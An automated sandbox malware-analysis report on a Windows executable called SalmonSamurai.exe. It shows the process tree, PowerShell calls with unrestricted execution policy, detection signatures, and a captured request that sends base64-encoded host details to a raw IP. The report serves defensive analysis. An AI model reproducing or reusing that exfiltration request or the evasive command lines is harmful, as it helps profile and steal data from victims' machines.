Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SalmonSamurai.exe

Overview

General Information

Sample name:SalmonSamurai.exe
Analysis ID:1579955
MD5:4ce4a1f912d0b9840a7f568454c6c45a
SHA1:bbf41f3dee85e038f1cb4965269bb0f06b3bb27a
SHA256:83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5
Infos:

Detection

Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Drops large PE files
Loading BitLocker PowerShell Module
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • SalmonSamurai.exe (PID: 2344 cmdline: "C:\Users\user\Desktop\SalmonSamurai.exe" MD5: 4CE4A1F912D0B9840A7F568454C6C45A)
    • SalmonSamurai.exe (PID: 3964 cmdline: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • cmd.exe (PID: 1912 cmdline: C:\Windows\system32\cmd.exe /d /s /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 1168 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 3824 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1588 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1732 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1848 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SalmonSamurai.exe (PID: 2840 cmdline: "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • SalmonSamurai.exe (PID: 2520 cmdline: "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 6EA18AE76085155E2681CCA92745A9AF)
      • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • findstr.exe (PID: 3672 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • powershell.exe (PID: 316 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1580 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2028 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4484 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2412 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7048 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6936 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7360 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7524 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7708 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7716 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7744 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7868 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7892 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7956 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentImage: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentProcessId: 3964, ParentProcessName: SalmonSamurai.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 1588, ProcessName: powershell.exe
Sigma detected: Console CodePage Lookup Via CHCP
Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1912, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 1168, ProcessName: chcp.com
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentImage: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe, ParentProcessId: 3964, ParentProcessName: SalmonSamurai.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 1588, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SalmonSamurai.exeReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\SalmonSamurai.exeEXE: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeEXE: powershell.exeJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeEXE: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to behavior

Compliance

barindex
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\SalmonSamurai.exeEXE: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeEXE: powershell.exeJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeEXE: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to behavior
Uses 32bit PE files
Source: SalmonSamurai.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Creates license or readme file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txtJump to behavior
PE / OLE file has a valid certificate
Source: SalmonSamurai.exeStatic PE information: certificate valid
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SalmonSamurai.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Binary contains paths to debug symbols
Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D230C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb&0$ source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ft.Automation.pdbK source: powershell.exe, 00000011.00000002.1738372742.000001AAEA38D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D230C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dllon.pdbJ source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000013.00000002.1697930434.000001E0D2620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000013.00000002.1590406499.000001E0B82EA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000013.00000002.1697930434.000001E0D2620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soapon.pdb+ source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asarJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtracted\resourcesJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeFile opened: C:\Users\user\AppData\Roaming\NsisExtractedJump to behavior
Source: Joe Sandbox ViewIP Address: 172.64.41.3 172.64.41.3
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownTCP traffic detected without corresponding DNS query: 89.187.28.253
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /call.php?api=register&username=cmVwb3J0&userdata=OCBHQl9mYWxzZV8zV1JTTF90cnVlX0RQU19YSV9XaW5kb3dzIDEwIFByb185NiBtaW51dGVzICgwLjYwIGhvdXJzKV9DOlxVc2Vyc1xmcm9udGRlc2tfNTcxMzQ1X2Zyb250ZGVza19XaW5kb3dzX05UX3g2NF8xMC4wLjE5MDQ1X0M6XFVzZXJzXGZyb250ZGVza1xBcHBEYXRhXFJvYW1pbmdfQzpcVXNlcnNcRlJPTlREfjFcQXBwRGF0YVxMb2NhbFxUZW1wX0ZST05UREVTSy1QQ19fSW50ZWw2NCBGYW1pbHkgNiBNb2RlbCAxNDMgU3RlcHBpbmcgOCwgR2VudWluZUludGVsX0FNRDY0X0M6XzJfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ1xOc2lzRXh0cmFjdGVkXFNhbG1vblNhbXVyYWkuZXhl HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: 89.187.28.253Connection: close
Source: SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: chttps://www.baidu.com/s?ie={inputEncoding}&wd={searchTerms}https://www.baidu.com/s?ie={inputEncoding}&word={searchTerms}https://www.baidu.com/{google:pathWildcard}/s?ie={inputEncoding}&word={searchTerms}sigs_ssp{google:baseURL}#q={searchTerms}{google:baseURL}search#q={searchTerms}{google:baseURL}webhp#q={searchTerms}{google:baseURL}s#q={searchTerms}{google:baseURL}s?q={searchTerms}https://go.mail.ru/msearch?q={searchTerms}&{mailru:referralID}https://m.so.com/s?ie={inputEncoding}&q={searchTerms}https://m.so.com/index.php?ie={inputEncoding}&q={searchTerms}https://m.sogou.com/web/{google:pathWildcard}?ie={inputEncoding}&keyword={searchTerms}http://searchatlas.centrum.cz/?q={searchTerms}http://hladaj.atlas.sk/fulltext/?phrase={searchTerms}http://isearch.avg.com/search?q={searchTerms}http://search.avg.com/route/?q={searchTerms}&lng={language}https://isearch.avg.com/search?q={searchTerms}https://search.avg.com/route/?q={searchTerms}&lng={language}http://search.babylon.com/?q={searchTerms}http://search.conduit.com/Results.aspx?q={searchTerms}http://www.delfi.lt/paieska/?q={searchTerms}http://www.delta-search.com/?q={searchTerms}http://www1.delta-search.com/home?q={searchTerms}http://www1.delta-search.com/?q={searchTerms}http://www2.delta-search.com/home?q={searchTerms}http://www2.delta-search.com/?q={searchTerms}http://www.search.delta-search.com/home?q={searchTerms}http://www.search.delta-search.com/?q={searchTerms}http://www.yhs.delta-search.com/home?q={searchTerms}http://www.yhs.delta-search.com/?q={searchTerms}http://mixidj.delta-search.com/home?q={searchTerms}http://mixidj.delta-search.com/?q={searchTerms}http://search.goo.ne.jp/web.jsp?MT={searchTerms}&IE={inputEncoding}http://search.goo.ne.jp/sgt.jsp?MT={searchTerms}&CL=plugin&FM=json&IE={inputEncoding}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx#q={searchTerms}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx#q={searchTerms}http://start.iminent.com/?q={searchTerms}http://start.iminent.com/StartWeb/1033/homepage/#q={searchTerms}http://search.incredibar.com/?q={searchTerms}http://mystart.incredibar.com/?search={searchTerms}https://www.neti.ee/cgi-bin/otsing?query={searchTerms}&src=webhttps://www.neti.ee/api/suggestOS?suggestVersion=1&suggestQuery={searchTerms}https://nova.rambler.ru/search?query={searchTerms}https://nova.rambler.ru/suggest?v=3&query={searchTerms}http://www.search-results.com/web?q={searchTerms}http://search.snap.do/?q={searchTerms}http://feed.snapdo.com/?q={searchTerms}http://feed.snap.do/?q={searchTerms}http://en.softonic.com/s/{searchTerms}http://www.softonic.com/s/{searchTerms}http://www.softonic.com.br/s/{searchTerms}http://buscador.softonic.com/?q={searchTerms}http://nl.softonic.com/s/{searchTerms}https://search.softonic.com/?q={searchTerms}https://en.softonic.com/s/{searchTerms}https://www.softonic.com/s/{searchTerms}https://www.softonic.com.br/s/{searchTerms}https://buscador.softonic.com/?q={searchTerms}https://nl.softonic.com/s/{s
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Dec 2024 15:52:33 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ak.apnstatic.com/media/images/favicon_search-results.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://arianna.libero.it/search/abin/integrata.cgi?query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscador.terra.es/Default.aspx?source=Search&ca=s&query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscador.terra.es/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscador.terra.es/favicon.icohttp://buscador.terra.es/Default.aspx?source=Search&ca=s&query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscar.terra.com.ar/Default.aspx?source=Search&ca=s&query=
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscar.terra.com.ar/favicon.ico
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://buscar.terra.com.ar/favicon.icohttp://buscar.terra.com.ar/Default.aspx?source=Search&ca=s&que
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://clients3.google.com/cert_upload_json
Source: SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://crbug.com/1138528
